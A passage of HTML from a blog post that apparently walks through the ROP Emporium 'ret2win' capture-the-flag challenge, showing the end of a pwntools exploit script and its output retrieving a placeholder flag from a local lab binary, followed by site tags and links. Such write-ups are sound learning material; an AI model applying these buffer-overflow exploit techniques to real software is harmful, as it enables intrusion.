</span><span class="n">io</span><span class="p">.</span><span class="n">writeafter</span><span class="p">(</span><span class="s">'&gt;'</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>

<span class="n">pwn</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">clean</span><span class="p">().</span><span class="n">decode</span><span class="p">())</span>
</pre></table></code></div></div><p>Running the above script we get correct flag.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>vx@archie:ret2win<span class="nv">$ </span>python3 x.py
<span class="o">[</span>+] Starting <span class="nb">local </span>process <span class="s1">'./ret2win'</span>: pid 45427
<span class="o">[</span><span class="k">*</span><span class="o">]</span>  Thank you!
    Well <span class="k">done</span><span class="o">!</span> Here<span class="s1">'s your flag:
    ROPE{a_placeholder_32byte_flag!}
[*] Process '</span>./ret2win<span class="s1">' stopped with exit code 0 (pid 45427)
</span></pre></table></code></div></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/thuri10.github.io/categories/ropemporium/'>ropemporium</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/thuri10.github.io/tags/ctf/" class="post-tag no-text-decoration" >ctf</a> <a href="/thuri10.github.io/tags/ropemporium/" class="post-tag no-text-decoration" >ropemporium</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Ropemporium+Ret2win+challenge+-+LaByte&url=https%3A%2F%2Fthuri10.github.io%2Fthuri10.github.io%2Fposts%2Fropemporium-ret2win%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Ropemporium+Ret2win+challenge+-+LaByte&u=https%3A%2F%2Fthuri10.github.io%2Fthuri10.github.io%2Fposts%2Fropemporium-ret2win%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fthuri10.github.io%2Fthuri10.github.io%2Fposts%2Fropemporium-ret2win%2F&text=Ropemporium+Ret2win+challenge+-+LaByte" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/thuri10.github.io/tags/ctf/">ctf</a> <a class="post-tag" href="/thuri10.github.io/tags/ropemporium/">ropemporium</a> <a class="post-tag" href="/thuri10.github.io/tags/malware/">malware</a> <a class="post-tag" href="/thuri10.github.io/tags/android/">android</a> <a class="post-tag" href="/thuri10.github.io/tags/appsec/">appsec</a> <a class="post-tag" href="/thuri10.github.io/tags/reverse/">reverse</a> <a class="post-tag" href="/thuri10.github.io/tags/c/">c++</a> <a class="post-tag" href="/thuri10.github.io/tags/go/">go</a> <a class="post-tag" href="/thuri10.github.io/tags/redlinestealer/">redlinestealer</a> <a class="post-tag" href="/thuri10.github.io/tags/remcosrat/">remcosrat</a></div></div></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/thuri10.github.io/posts/ropemporium-callme/"><div class="card-body"> <em class="small" data-ts="1640023680" data-df="ll" > Dec 20, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Ropemporium callme challenge</h3><div class="text-muted small"><p> Introduction Challenge Description The goal of the challenge is understanding how more than one argument is passed in x64 function. The challenge can be downloaded from the author`s website ropem...</p></div></div></a></div><div class="card"> <a href="/thuri10.github.io/posts/ropemporium-split/"><div class="card-body"> <em class="small" data-ts="1639764420" data-df="ll" > Dec 17, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Ropemporium split challenge</h3><div class="text-muted small"><p> The elements that allowed you to complete ret2win are still present, they’ve just been split apart. Find them and recombine them using a short ROP chain The goal of this challenge is to understand...</p></div></div></a></div><div class="card"> <a href="/thuri10.github.io/posts/ropemporium-ret2csu/"><div class="card-body"> <em class="small" data-ts="1640023680" data-df="ll" > Dec 20, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Ropemporium Ret2csu challenge</h3><div class="text-muted small"><p> We’re back in ret2win territory, but this time with no useful gadgets.How will we populate critical registers without them? The goal of this level is understanding of universal rop techniques due t...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/thuri10.github.io/posts/ropemporium-split/" class="btn btn-outline-primary" prompt="Older"><p>Ropemporium split challenge</p></a> <a href="/thuri10.github.io/posts/ropemporium-callme/" class="btn btn-outline-primary" prompt="Newer"><p>Ropemporium callme challenge</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/username">thuri</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/thuri10.github.io/tags/ctf/">ctf</a> <a class="post-tag" href="/thuri10.github.io/tags/ropemporium/">ropemporium</a> <a class="post-tag" href="/thuri10.github.io/tags/malware/">malware</a> <a class="post-tag" href="/thuri10.github.io/tags/android/">android</a> <a class="post-tag" href="/thuri10.github.io/tags/appsec/">appsec</a> <a class="post-tag" href="/thuri10.github.io/tags/reverse/">reverse</a> <a class="post-tag" href="/thuri10.github.io/tags/c/">c++</a> <a class="post-tag" href="/thuri10.github.io/tags/go/">go</a> <a class="post-tag" href="/thuri10.github.io/tags/redlinestealer/">redlinestealer</a> <a class="post-tag" href="/thuri10.github.io/tags/remcosrat/">remcosrat</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/thuri10.github.io/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/thuri10.github.io/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/thuri10.github.io/app.js"></script>
